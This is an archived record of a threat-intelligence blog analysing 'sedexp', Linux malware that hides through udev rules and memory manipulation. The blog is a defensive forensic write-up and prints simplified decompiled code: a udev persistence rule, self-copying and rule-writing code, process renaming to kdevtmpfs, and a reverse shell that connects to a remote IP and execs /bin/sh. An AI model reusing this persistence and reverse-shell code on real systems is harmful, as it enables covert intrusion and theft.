{
	"id": "b7df60ec-8076-4531-87dc-31b408524174",
	"created_at": "2026-04-06T00:14:20.711454Z",
	"updated_at": "2026-04-10T13:12:19.704582Z",
	"deleted_at": null,
	"sha1_hash": "d67679ac0e18d2b25358cde1ff8a661611bd6fd7",
	"title": "Unveiling sedexp: A Stealthy Linux Malware Exploiting udev Rules",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 68324,
	"plain_text": "Unveiling sedexp: A Stealthy Linux Malware Exploiting udev Rules\r\nBy Zachary Reichert\r\nPublished: 2024-08-19 · Archived: 2026-04-05 17:38:08 UTC\r\nAugust 19, 2024 4 Minute Read\r\nStroz Friedberg identified a stealthy malware, dubbed “sedexp,” utilizing Linux udev rules to achieve persistence and evade detection. This advanced threat, active since 2022, hides in plain sight while providing attackers with reverse shell capabilities and advanced concealment tactics.\r\nIntroduction\r\nStroz Friedberg recently identified active usage of a lesser-known Linux persistence technique by an as-yet unidentified piece of malware, dubbed “sedexp,” during an investigation. Despite the malware being in use since at least 2022, Stroz Friedberg has found multiple instances available in online sandboxes with zero detections. At the time of this writing, the persistence technique used is not documented by MITRE ATT\u0026CK. This blog details the active use of this malware and its persistence technique by a financially motivated threat actor.\r\nBackground on udev Rules\r\nSedexp utilizes udev rules to maintain persistence. The malware hides the rules utilizing memory manipulation techniques detailed later in this post.\r\nudev is a device management system for the Linux kernel, responsible for managing device nodes in the /dev directory. It dynamically creates or removes device node files, handles hotplug events to configure new devices, and loads drivers as necessary. udev rules are configuration files used by udev to match devices and execute actions in response to events such as adding or removing devices.\r\nFor example, when a USB device is plugged in, udev uses rules to determine the proper drivers to load and what actions to take. These rules are stored in files typically found in /etc/udev/rules.d/ or /lib/udev/rules.d/. Each rule consists of conditions to match specific devices and corresponding actions to perform. A typical udev rule might look like this:\r\nACTION==\"add\", KERNEL==\"sdb1\", RUN+=\"/path/to/script\"\r\nIn this rule:\r\nACTION==\"add\" specifies that the rule applies when a device is added.\r\nKERNEL==\"sdb1\" matches the device name.\r\nRUN+=\"/path/to/script\" specifies a script to run when the rule conditions are met.\r\nhttps://www.aon.com/en/insights/cyber-labs/unveiling-sedexp\r\nPage 1 of 4\r\nTechnical Analysis\r\nPersistence through udev Rules\r\nDuring a recent investigation, Stroz Friedberg discovered malware using udev rules to maintain persistence. This technique allows the malware to execute every time a specific device event occurs, making it stealthy and difficult to detect. The udev rule identified is as follows:\r\nACTION==\"add\", ENV{MAJOR}==\"1\", ENV{MINOR}==\"8\", RUN+=\"asedexpb run:+\"\r\nBreaking down the rule:\r\nACTION==\"add\": This rule triggers when a device is added to the system.\r\nENV{MAJOR}==\"1\": This condition checks if the device's major number is 1, typically associated with memory devices such as /dev/mem, /dev/null, and /dev/zero.\r\nENV{MINOR}==\"8\": This condition checks if the device's minor number is 8, which corresponds to /dev/random for major number 1.\r\nRUN+=asedexpb: When the above conditions are met, the program or script asedexpb is executed along with any arguments.\r\nThis rule ensures that the malware is run whenever /dev/random is loaded. /dev/random is a special file that serves as a random number generator, used by various system processes and applications to obtain entropy for cryptographic operations, secure communications, and other functions requiring randomness. It is loaded by the operating system on every reboot, meaning this rule would effectively ensure that the sedexp script is run upon system reboot.\r\nMalware Capabilities\r\nThe sedexp malware has notable features such as:\r\nReverse Shell Capability: It includes a reverse shell, allowing the threat actor to maintain control over the compromised system.\r\nMemory Modification for Stealth: The malware modifies memory to hide any file containing the string \"sedexp\" from commands like ls or find. In Stroz Friedberg’s investigation, this capability was used to conceal webshells, modified Apache configuration files, and the udev rule itself.\r\nCode Analysis\r\nThe decompiled code reveals several steps that the sedexp malware takes to ensure its persistence and stealth. Here are key parts simplified for clarity:\r\nMemory Allocation and Argument Handling:\r\nThe malware manipulates arguments to obfuscate its presence.\r\nIt changes the process name to kdevtmpfs using prctl to blend in with legitimate system processes.\r\nvoid *memory = calloc(arg_count + 1, sizeof(void *));\r\nfor (int i = 0; i \u003c arg_count; i++) {\r\n    memory[i] = strdup(arguments[i]);\r\n    memset(arguments[i], 0, strlen(arguments[i]));\r\n}\r\narguments[0] = \"kdevtmpfs\";\r\nprctl(PR_SET_NAME, \"kdevtmpfs\", 0, 0, 0);\r\nPersistence Setup: The malware sets up persistence by copying itself to a specific location and creating a udev rule.\r\nchar buffer[4096];\r\nif (readlink(\"/proc/self/exe\", buffer, sizeof(buffer) - 1) != -1) {\r\n    char new_path[1024];\r\n    snprintf(new_path, sizeof(new_path), \"/lib/udev/%s\", basename(buffer));\r\n    system(\"cp -f %s %s \u0026\u0026 sync\", buffer, new_path);\r\n    char rule_path[1024];\r\n    snprintf(rule_path, sizeof(rule_path), \"/etc/udev/rules.d/99-%s.rules\", basename(buffer));\r\n    FILE *rule_file = fopen(rule_path, \"w+\");\r\n    if (rule_file) {\r\n        fprintf(rule_file, \"ACTION==\\\"add\\\", ENV{MAJOR}==\\\"1\\\", ENV{MINOR}==\\\"8\\\", RUN+=\\\"%s %s:+\\\"\\n\", new_path, \"run\");\r\n        fclose(rule_file);\r\n    } else {\r\n        exit(-1);\r\n    }\r\n} else {\r\n    exit(-1);\r\n}\r\nReverse Shell Execution: Depending on the input, it can set up a reverse shell, either using forkpty or creating pipes and forking a new process.\r\nint socket_fd = socket(AF_INET, SOCK_STREAM, 0);\r\nstruct sockaddr_in addr;\r\naddr.sin_family = AF_INET;\r\naddr.sin_port = htons(port);\r\naddr.sin_addr.s_addr = inet_addr(ip_address);\r\nconnect(socket_fd, (struct sockaddr *)\u0026addr, sizeof(addr));\r\ndup2(socket_fd, STDIN_FILENO);\r\ndup2(socket_fd, STDOUT_FILENO);\r\ndup2(socket_fd, STDERR_FILENO);\r\nexecl(\"/bin/sh\", \"sh\", NULL);\r\nThreat Intelligence\r\nOur analysis revealed that the malware was employed by a financially motivated threat actor. Key threat intelligence findings include:\r\nCredit Card Scraping: The malware was used to hide credit card scraping code on a webserver, indicating a focus on financial gain.\r\nOSINT Findings: Multiple public instances of this malware on an online sandbox had zero detections, highlighting its stealthy nature.\r\nHistorical Use: This malware has been in use since at least 2022.\r\nConclusion\r\nThe discovery of sedexp demonstrates the evolving sophistication of financially motivated threat actors beyond ransomware. Leveraging rarely utilized persistence techniques like udev rules highlights the need for thorough and advanced forensic analysis. Organizations should continuously update their detection capabilities, implement comprehensive security measures to mitigate such threats, and ensure a capable DFIR firm is engaged to complete a forensic review of any possibly compromised servers.\r\nSamples\r\nBelow are hashes of additional public samples discovered by Stroz Friedberg. Many online sandboxes reported few or no detections at the time this blog was released:\r\nSHA256 43f72f4cdab8ed40b2f913be4a55b17e7fd8a7946a636adb4452f685c1ffea02\r\nSHA256 94ef35124a5ce923818d01b2d47b872abd5840c4f4f2178f50f918855e0e5ca2\r\nSHA256 b981948d51e344972d920722385f2370caf1e4fac0781d508bc1f088f477b648\r\nContributors: Daniel Stein and Joshua Pivirotto.\r\nSource: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp"
	],
	"report_names": [
		"unveiling-sedexp"
	],
	"threat_actors": [],
	"ts_created_at": 1775434460,
	"ts_updated_at": 1775826739,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.pdf",
		"text": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.txt",
		"img": "https://archive.orkl.eu/d67679ac0e18d2b25358cde1ff8a661611bd6fd7.jpg"
	}
}